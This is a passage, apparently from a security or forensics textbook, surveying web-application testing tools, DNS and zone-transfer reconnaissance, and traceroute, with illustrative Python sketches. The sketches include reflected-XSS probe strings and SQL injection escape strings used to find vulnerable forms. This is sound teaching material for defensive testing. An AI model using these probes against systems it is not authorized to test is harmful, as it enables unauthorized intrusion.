Figure 3-24 WebWatchBot monitors various IP devices.

WebWatchBot

WebWatchBot is monitoring and analysis software for Web sites and IP devices and includes ping, HTTP, HTTPS, SMTP, POP3, FTP, port, and DNS checks. It is shown in Figure 3-24 and can do the following:

• Allows a user to quickly implement Web site monitoring for availability, response time, and error-free page loading

• Alerts at the first sign of trouble

• Monitors the end-to-end user experience through the multiple steps typically followed by a user (e.g., login to site, retrieve item from database, add to shopping cart, and check out)

• Implements server monitoring and database monitoring to understand the impact of individual infrastructure components on the overall response time of the Web site and Web-based applications

• Monitors Windows and UNIX servers, workstations, and devices for disk space, memory usage, CPU usage, services, processes, and events

• Displays and publishes powerful reports and charts showing adherence to service-level agreements

Paros



Paros is a Java-based tool for testing Web applications and insecure sessions. It acts as a proxy to intercept and modify all HTTP and HTTPS data between server and client, including cookies and form fields. It has five main functions:

• The trap function traps and modifies HTTP (and HTTPS) requests/responses manually.

• The filter function detects and alerts the user about patterns in HTTP messages for manipulation.

• The scan function scans for common vulnerabilities.

• The options menu allows the user to set various options, such as setting another proxy server to bypass a firewall.

• The logs function views and examines all HTTP request/response content.

Paros is shown in Figure 3-25 and features the following:

• Supports proxy authentication

• Supports individual server authentication

Source: http://www.parosproxy.org/index.shtml. Accessed 2/2007.

Figure 3-25 Paros intercepts all data between client and server to check the site’s security.



Source: http://www.hp.com. Accessed 2/2007.

Figure 3-26 HP WebInspect performs Web application security testing and assessment.

• Supports large site testing both in scanning and spidering

• Supports extensions and plug-ins

HP WebInspect

HP WebInspect performs Web application security testing and assessment. It identifies known and unknown vulnerabilities within the Web application layer, and checks to validate that the Web server is configured properly.

HP WebInspect is shown in Figure 3-26 and its features include the following:

• Scans quickly

• Automates Web application security testing and assessment

• Offers innovative assessment technology for Web services and Web application security

• Enables application security testing and collaboration across the application life cycle

• Meets legal and regulatory compliance requirements

• Conducts penetration testing with advanced tools (HP Security Toolkit)

• Can be configured to support any Web application environment



keepNI

keepNI checks the vital services of a Web site at an interval chosen by the user. If the check takes too long, it is considered a timeout fault. When a fault is detected, one or more alerts can be initiated to inform the operator or computerized systems.

keepNI is shown in Figure 3-27, and its features include the following:

• Prevents false alarms

• Fast broken-links scanner with IPL technology

• Variety of alert options (e-mail, fax, phone, SMS, visual, and audio)

• Performance viewer displays information, statistics, charts, and graphs

• Plug-ins architecture allows for a quick and easy use of new downloadable program features (e.g., alerts and service monitors)

• Low system resource consumption

keepNI monitors the following services:

• ping: Sends an ICMP echo request to the target host/device to verify IP-level connectivity

• HTTP: Requests a Web page to make sure any user can enter the Web site

• DNS: Makes sure that the DNS server is working properly by sending it queries

Source: http://www.keepni.com. Accessed 2/2007.

Figure 3-27 keepNI checks many services of a Web site.


• POP: Checks the incoming mail service by simulating an e-mail client: it logs on to a given account using the username and password provided by the user and checks for an incoming mail message

• SMTP: Connects to the SMTP server and performs the SMTP handshake sequence to ensure that the server is operating properly

• FTP: Checks logons on the server using the provided username and password

• POP/SMTP transaction: Sends an e-mail to itself through the SMTP server and checks whether the e-mail has arrived or not at the POP server

• HTTP/HTTPS transaction: Tests all kinds of forms and Web applications (CGI, etc.) on the server and makes sure the transaction application is in working order
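The exact handshake keepNI performs is not documented here. The following Python sketch of an SMTP check uses the standard `smtplib` module and assumes that receiving the 220 greeting, getting a 250 reply to EHLO (or HELO as a fallback), and closing with QUIT counts as proper operation. The function name `check_smtp` and the `local_hostname` value are hypothetical.

```python
import smtplib


def check_smtp(host: str, port: int = 25, timeout: float = 10.0) -> bool:
    """Return True if the server greets us and accepts EHLO or HELO.

    Leaving the `with` block sends QUIT and closes the connection.
    """
    try:
        # Connecting reads the greeting; a non-220 reply raises SMTPConnectError.
        with smtplib.SMTP(host, port, local_hostname="monitor.invalid",
                          timeout=timeout) as smtp:
            code, _ = smtp.ehlo()
            if code != 250:
                code, _ = smtp.helo()  # fall back to the older HELO greeting
            return code == 250
    except (smtplib.SMTPException, OSError):
        # Refused connection, timeout, bad greeting, or unexpected disconnect.
        return False
```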



Wikto

Wikto checks for flaws in Web servers. It is shown in Figure 3-28. It offers Web-based vulnerability scanning and can scan a host for entries in the Google Hacking Database.

Mapper

Mapper helps to map the files, file parameters, and values of any site. Simply browse the site as a normal user while recording the session with Achilles or another proxy, and run Mapper on the resulting log file. It creates an Excel CSV file that shows the directory and file structure of the site, the parameter names of every dynamic page encountered (such as ASP/JSP/CGI), and their values every time they are requested. This tool helps to quickly locate design errors and parameters that may be prone to SQL injection or parameter tampering problems.

Mapper supports nonstandard parameter delimiters and MVC-based Web sites.
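Mapper's own log format is not described here. Assuming the proxy log has already been reduced to a list of requested URLs, the core of the mapping step can be sketched in Python as below: each query-string parameter becomes one CSV row holding the path, the parameter name, and the value. The function name `map_requests` is hypothetical, and the sketch only understands standard `&`-separated query strings, not POST bodies or the nonstandard delimiters Mapper supports.

```python
import csv
import io
from typing import List
from urllib.parse import parse_qsl, urlsplit


def map_requests(urls: List[str]) -> str:
    """Return CSV text with one row per (path, parameter, value) observed."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow(["path", "parameter", "value"])
    for url in urls:
        parts = urlsplit(url)
        # keep_blank_values keeps parameters such as "id=" that carry no value.
        params = parse_qsl(parts.query, keep_blank_values=True)
        if not params:
            # Static pages still belong in the site's file structure.
            writer.writerow([parts.path, "", ""])
        for name, value in params:
            writer.writerow([parts.path, name, value])
    return out.getvalue()
```

Sorting or filtering the resulting rows by parameter name is a quick way to spot parameters, such as numeric IDs, that deserve SQL injection or tampering tests.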

Figure 3-28 Wikto checks Web servers for flaws.




N-Stalker Web Application Security Scanner

N-Stalker offers a complete suite of Web security assessment checks to enhance the overall security of Web applications against vulnerabilities and attacks. It is shown in Figure 3-29, and its features include the following:

• Policy-driven Web application security scanning: N-Stalker works by applying scanning policies to target Web applications. Creating custom scan policies will allow for standardized scan results over a determined time period.

• Component-oriented Web crawler and scanner engine: Reverse proxies can obscure multiple platforms and technologies behind one simple URL. N-Stalker will crawl through the Web application using a component-oriented perspective. For every available component found, N-Stalker explores its relationship within the application and uses it to create custom and more effective security checks.

• Legal compliance-oriented security analysis: Legal regulations for security are different in many countries, and N-Stalker provides a policy configuration interface to configure a wide variety of security checks, including information leakage and event-driven information analysis.

• Enhanced in-line HTTP debugger: N-Stalker provides internal access to the Web spidering engine, giving the ability to debug each request and even modify aspects of the request itself before it gets sent to the Web server.

• Web attack signatures database: N-Stalker inspects the Web server infrastructure against more than 35,000 signatures from different technologies, ranging from third-party software packages to well-known Web server vendors.

• Support for multiple Web authentication schemes: N-Stalker supports a wide variety of Web authentication schemes, including Web form requests, standard HTTP authentication, and X.509 digital certificate authentication.

• Enhanced report generation for scanning comparison: N-Stalker provides an enhanced report creation engine, creating comparison and trend analysis reports of Web applications based on scan results generated over a determined time period.

• Special attack console to explore vulnerabilities: When a vulnerability is found, N-Stalker provides access to a special attack console, where the user may inspect raw requests and responses in different views, from raw text to hexadecimal table.

Source: http://www.nstalker.com/products/enterprise/. Accessed 2/2007.

Figure 3-29 N-Stalker offers a suite of Web security checks.


Source: http://www.ibm.com. Accessed 2/2007.

Figure 3-30 Scrawlr crawls Web sites, looking for SQL injection vulnerabilities.



Scrawlr

Scrawlr crawls a Web site and audits it for SQL injection vulnerabilities. Specifically, it is designed to detect SQL injection vulnerabilities in dynamic Web pages that will be indexed by search engines, but it can be used to test virtually any kind of Web site that supports basic HTTP proxies and does not require authentication.

Scrawlr is shown in Figure 3-30 and has the following features:

• Designed to detect SQL injection vulnerabilities in dynamic Web pages

• Identifies verbose SQL injection vulnerabilities in URL parameters

• Can be configured to use a proxy to access the Web site

• Identifies the type of SQL server in use

• Extracts table names (verbose only) to guarantee no false positives

• Scans Web applications spread across many different host names and subdomains



Exploit-Me

Exploit-Me is a suite of Firefox Web application security testing tools. It is designed to be lightweight and easy to use. Exploit-Me integrates directly with Firefox and consists of two tools: XSS-Me and SQL Inject-Me.

XSS-Me

XSS-Me tests for reflected cross-site scripting (XSS), but not stored XSS. It works by submitting HTML forms and substituting the form value with strings that are representative of an XSS attack.

If the resulting HTML page sets a specific JavaScript value, then the tool marks the page as vulnerable to the given XSS string. It does not attempt to compromise the security of the given system but looks for possible entry points for an attack against the system. XSS-Me is shown in Figure 3-31.
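Confirming that a specific JavaScript value was set, as XSS-Me does, requires running the page in a browser. The Python sketch below swaps in a simpler heuristic: a probe string that comes back in the page exactly as sent, without HTML escaping, marks a likely reflected XSS entry point. The probe list, `find_reflected_xss`, and the two example handlers are hypothetical; `submit` stands in for filling in a form field and fetching the resulting HTML.

```python
import html
from typing import Callable, List

# Illustrative probe strings; real tools ship far larger lists.
XSS_PROBES = [
    "<script>alert('xss')</script>",
    "\"><img src=x onerror=alert(1)>",
]


def find_reflected_xss(submit: Callable[[str], str],
                       probes: List[str] = XSS_PROBES) -> List[str]:
    """Return the probes that come back verbatim (unescaped) in the page."""
    hits = []
    for probe in probes:
        page = submit(probe)
        if probe in page:  # unescaped reflection suggests an injection point
            hits.append(probe)
    return hits


# Hypothetical form handlers used to exercise the check.
def vulnerable_search(term: str) -> str:
    return f"<p>Results for {term}</p>"


def escaped_search(term: str) -> str:
    return f"<p>Results for {html.escape(term)}</p>"


print(find_reflected_xss(vulnerable_search))  # both probes are reported
print(find_reflected_xss(escaped_search))     # []
```

Like XSS-Me, this only looks for possible entry points; it does not attempt to exploit them.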



SQL Inject-Me

SQL Inject-Me works like XSS-Me, only it tests for SQL injection vulnerabilities. It works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page. SQL Inject-Me is shown in Figure 3-32.
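SQL Inject-Me's actual escape strings and error signatures are not listed here, so the following Python sketch uses a small illustrative set. It follows the approach just described: submit each escape string and search the returned page for database error messages. `submit` is a hypothetical stand-in for filling in a form field and fetching the rendered HTML; `find_sql_errors` and `leaky_lookup` are likewise hypothetical.

```python
import re
from typing import Callable, List, Tuple

# Strings that break out of a quoted SQL literal (illustrative list).
ESCAPE_STRINGS = ["'", "\"", "')", "';--"]

# A few well-known database error fragments; real scanners use many more.
DB_ERROR_PATTERNS = [
    re.compile(r"you have an error in your sql syntax", re.I),                # MySQL
    re.compile(r"unclosed quotation mark after the character string", re.I),  # SQL Server
    re.compile(r"ORA-\d{5}"),                                                 # Oracle
    re.compile(r"syntax error at or near", re.I),                             # PostgreSQL
]


def find_sql_errors(submit: Callable[[str], str],
                    probes: List[str] = ESCAPE_STRINGS) -> List[Tuple[str, str]]:
    """Return (probe, matched error text) for each probe that leaks a DB error."""
    hits = []
    for probe in probes:
        page = submit(probe)
        for pattern in DB_ERROR_PATTERNS:
            match = pattern.search(page)
            if match:
                hits.append((probe, match.group(0)))
                break  # one signature per probe is enough
    return hits


# Hypothetical handler that splices input into SQL and shows raw errors.
def leaky_lookup(value: str) -> str:
    if "'" in value:
        return "Unclosed quotation mark after the character string ''."
    return "<p>No results</p>"


print(find_sql_errors(leaky_lookup))
```

A page that never echoes database errors can still be injectable, so an empty result from this kind of check is not proof of safety.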

Tools for Locating IP Addresses





Nslookup

Nslookup queries DNS information for host name resolution. It is bundled with both UNIX and Windows operating systems and can be accessed from the command prompt. When Nslookup is run, it shows the host name and IP address of the DNS server that is configured for the local system, and then displays a command prompt for further queries. This starts interactive mode, which allows the user to query name servers for information about various hosts and domains or to print a list of hosts in a domain.

Source: http://www.securitycompass.com. Accessed 2/2007.

Figure 3-31 XSS-Me checks for XSS vulnerabilities.

Source: http://www.securitycompass.com. Accessed 2/2007.

Figure 3-32 SQL Inject-Me tests for SQL injection vulnerabilities.

When an IP address or host name is supplied as an argument to the Nslookup command, it operates in noninteractive mode. This mode prints only the name and the requested information for a host or domain.
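For scripting simple lookups, Python's standard `socket` module offers rough equivalents of a noninteractive Nslookup query. This is only a sketch, with one important difference: these calls go through the operating system's resolver, which may consult the local hosts file and caches, rather than querying a chosen DNS server directly, so they cannot replace Nslookup's server command. The function names are hypothetical.

```python
import ipaddress
import socket
from typing import List, Optional


def lookup(name: str) -> List[str]:
    """Forward lookup: host name -> sorted IPv4 addresses (system resolver).

    Raises socket.gaierror if the name does not resolve.
    """
    _canonical, _aliases, addresses = socket.gethostbyname_ex(name)
    return sorted(addresses)


def reverse_lookup(address: str) -> Optional[str]:
    """Reverse (PTR) lookup: IP address -> host name, or None if none is found."""
    try:
        hostname, _aliases, _addresses = socket.gethostbyaddr(address)
        return hostname
    except OSError:  # socket.herror and socket.gaierror are OSError subclasses
        return None


if __name__ == "__main__":
    import sys
    # Like noninteractive mode: each argument is a host name or an IP address.
    for arg in sys.argv[1:]:
        try:
            ipaddress.ip_address(arg)
        except ValueError:
            print(arg, "->", lookup(arg))
        else:
            print(arg, "->", reverse_lookup(arg))
```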

Nslookup can send queries to a DNS server other than the default one by invoking the server command. Typing server <name>, where <name> is the host name of the server, makes that server the default for subsequent queries.

Nslookup employs the domain name delegation method when used on the local domain. For instance, typing hr.targetcompany.com will query for the particular name and, if not found, will go one level up to find targetcompany.com. To query a host name outside the domain, a fully qualified domain name (FQDN) must be typed. This can be easily obtained from a WHOIS database query.

In addition to Nslookup, the attacker can use the dig and host commands to obtain more information on UNIX systems. The Domain Name System (DNS) namespace is divided into zones, each of which stores name information about one or more DNS domains. For each DNS domain name included in a zone, the zone serves as the storage database and the authoritative source of information about that domain. At a very basic level, an attacker can try to gain more information by using the various Nslookup switches. At a higher level, he or she can attempt a zone transfer at the DNS level; if the server permits it, a zone transfer discloses every record in the zone, which can have drastic implications.

Proper configuration and implementation of DNS is very important. A penetration tester must be knowledgeable about the standard practices in DNS configurations. The system must refuse inappropriate queries, preventing crucial information leakage.

To restrict zone transfers, an administrator must specify the exact IP addresses from which zone transfers are allowed. Because zone transfers use TCP, the firewall must be configured to control access to TCP port 53. It may be a good idea to use more than one DNS server, or the split DNS approach, where one DNS server caters to the external interface and the other to the internal interface. This lets the internal DNS server act like a proxy server and check for information leaks from external queries.
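Zone transfers are requested with the AXFR query type (type 252) and, unlike most ordinary lookups, are carried over TCP, which is why TCP port 53 matters in the firewall rules just described. The following Python sketch only builds the raw AXFR request, framed with the 2-byte length prefix that DNS uses over TCP (RFC 1035); it does not send it. The helper names and the default query ID are hypothetical. Administrators testing their own servers more commonly run `dig @<server> <zone> AXFR`, which should be refused from any address that is not on the allowed list.

```python
import struct

QTYPE_AXFR = 252  # query type requesting a full zone transfer
QCLASS_IN = 1     # Internet class


def encode_name(domain: str) -> bytes:
    """Encode a domain as length-prefixed DNS labels ending in a zero byte.

    Checks the 63-byte label limit but not the 255-byte total name limit.
    """
    out = bytearray()
    for label in domain.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"invalid label: {label!r}")
        out.append(len(raw))
        out += raw
    out.append(0)
    return bytes(out)


def build_axfr_query(zone: str, query_id: int = 0x1234) -> bytes:
    """Build a TCP-framed AXFR query: length prefix, 12-byte header, question."""
    # Header: ID, flags 0 (standard query), QDCOUNT=1, AN/NS/ARCOUNT=0.
    header = struct.pack("!HHHHHH", query_id, 0, 1, 0, 0, 0)
    question = encode_name(zone) + struct.pack("!HH", QTYPE_AXFR, QCLASS_IN)
    message = header + question
    return struct.pack("!H", len(message)) + message
```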

Nslookup can be seen in Figure 3-33.



Traceroute

The best way to find the route to a target system is to use the Traceroute utility provided with most operating systems. This utility can detail the path IP packets travel between two systems. It can trace the number of routers the packets travel through, the time it takes to go between two routers, and, if the routers have DNS entries, the names of the routers, their network affiliations, and their geographic locations. Traceroute works by exploiting a feature of the Internet Protocol called time-to-live (TTL). The TTL field is interpreted to indicate the maximum number of routers a packet may transit. Each router that handles a packet decrements the TTL field in the IP header by one. When the count reaches zero, the router discards the packet and transmits an ICMP Time Exceeded error message to the originator of the packet.

Figure 3-33 Nslookup is included with all Windows and UNIX systems.


Figure 3-34 Traceroute is the best way to find out where a packet goes to reach its destination.

Traceroute sends out a packet addressed to the specified destination with the TTL field set to 1. The first router in the path receives the packet and decrements the TTL value by one; because the resulting TTL value is 0, it discards the packet and sends an ICMP Time Exceeded message back to the originating host. Traceroute records the IP address and DNS name of that router, and then sends out another packet with a TTL value of 2. This packet makes it through the first router and then times out at the next router in the path. This second router also sends an error message back to the originating host. Traceroute continues to do this, recording the IP address and name of each router, until a packet finally reaches the target host or until it decides that the host is unreachable. In the process, Traceroute records the time it took for each packet to travel to each router and back.
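Sending real probes requires raw sockets and administrator privileges, so the following Python sketch only simulates the TTL mechanism described above over a made-up path. The `Hop` class, the addresses (taken from private and documentation ranges), and the delays are hypothetical; the point is that every router decrements the TTL, and the router at which it reaches zero is the one that reports back.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class Hop:
    address: str
    delay_ms: float  # one-way delay from the previous hop (made-up values)


def send_probe(path: List[Hop], ttl: int) -> Tuple[str, float, bool]:
    """Simulate one probe along `path` (last entry is the target host).

    Returns (address that replied, round-trip time in ms, reached_target).
    """
    elapsed = 0.0
    for index, hop in enumerate(path):
        elapsed += hop.delay_ms
        if index == len(path) - 1:
            # The target itself answers (ICMP Echo Reply for Windows tracert,
            # Port Unreachable for UNIX traceroute's default UDP probes).
            return hop.address, 2 * elapsed, True
        ttl -= 1  # each router decrements the TTL in the IP header
        if ttl == 0:
            # This router discards the packet and returns ICMP Time Exceeded.
            return hop.address, 2 * elapsed, False
    raise ValueError("path must contain at least the target host")


def traceroute(path: List[Hop], max_hops: int = 30) -> List[Tuple[int, str, float]]:
    """Send probes with TTL = 1, 2, 3, ... until the target answers."""
    results = []
    for ttl in range(1, max_hops + 1):
        address, rtt, reached = send_probe(path, ttl)
        results.append((ttl, address, rtt))
        if reached:
            break
    return results


path = [Hop("10.0.0.1", 1.0), Hop("10.0.1.1", 2.0), Hop("192.0.2.10", 3.0)]
for ttl, address, rtt in traceroute(path):
    print(ttl, address, rtt)
```

With `max_hops` smaller than the path length, the simulated trace stops before the target, much as a real trace gives up when a host is unreachable.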

Following is an example of a Traceroute command and its output:

```
tracert 216.239.36.10

Tracing route to ns3.google.com [216.239.36.10] over a maximum of 30 hops:

  1  1262 ms   186 ms   124 ms  195.229.252.10
  2  2796 ms  3061 ms  3436 ms  195.229.252.130
  3   155 ms   217 ms   155 ms  195.229.252.114
  4  2171 ms  1405 ms  1530 ms  194.170.2.57
  5  2685 ms  1280 ms   655 ms  dxb-emix-ra.ge6303.emix.ae [195.229.31.99]
  6   202 ms   530 ms   999 ms  dxb-emix-rb.so100.emix.ae [195.229.0.230]
  7   609 ms  1124 ms  1748 ms  iar1-so-3-2-0.Thamesside.cw.net [166.63.214.65]
  8  1622 ms  2377 ms  2061 ms  eqixva-google-gige.google.com [206.223.115.21]
  9  2498 ms   968 ms   593 ms  216.239.48.193
 10  3546 ms  3686 ms  3030 ms  216.239.48.89
 11  1806 ms  1529 ms   812 ms  216.33.98.154
 12  1108 ms  1683 ms  2062 ms  ns3.google.com [216.239.36.10]

Trace complete.
```
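During an investigation, tracert output is often saved as evidence and compared over time. The following hypothetical Python helper, `parse_tracert`, turns Windows-style output like the example above into per-hop records with the average round-trip time. It assumes the usual three samples per hop, treats `*` (no reply) as a missing sample, and reports `<1 ms` as 1 ms.

```python
import re
from statistics import mean
from typing import List, NamedTuple, Optional


class HopRecord(NamedTuple):
    hop: int
    address: Optional[str]   # None when every probe timed out
    avg_ms: Optional[float]  # None when no round-trip time was recorded


# Hop number, three samples ("123 ms", "<1 ms", or "*"), then the host text.
HOP_LINE = re.compile(
    r"^\s*(?P<hop>\d+)"
    r"(?P<rtts>(?:\s+(?:<?\d+\s+ms|\*)){3})"
    r"\s+(?P<host>.+?)\s*$"
)


def parse_tracert(text: str) -> List[HopRecord]:
    hops = []
    for line in text.splitlines():
        m = HOP_LINE.match(line)
        if not m:
            continue  # banner, blank, and "Trace complete." lines
        samples = [int(v) for v in re.findall(r"<?(\d+)\s+ms", m["rtts"])]
        host = m["host"]
        bracketed = re.search(r"\[([^\]]+)\]", host)
        if not samples:
            address = None  # e.g. "Request timed out."
        elif bracketed:
            address = bracketed.group(1)  # "name [ip]" form
        else:
            address = host  # bare IP address
        avg = float(mean(samples)) if samples else None
        hops.append(HopRecord(int(m["hop"]), address, avg))
    return hops
```

Unusually slow hops or addresses that change between saved traces are the kinds of differences this makes easy to spot.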

Sometimes, during a Traceroute session, an attacker may not be able to trace past a packet-filtering device such as a firewall. The Windows version of Traceroute is shown in Figure 3-34.

McAfee Visual Trace

McAfee Visual Trace, previously known as NeoTrace, shows Traceroute output visually. It is shown in Figure 3-35.


Figure 3-35 McAfee Visual Trace shows Traceroute output visually.

WHOIS

Several operating systems provide a WHOIS utility. The following is the format to conduct a query from the command line: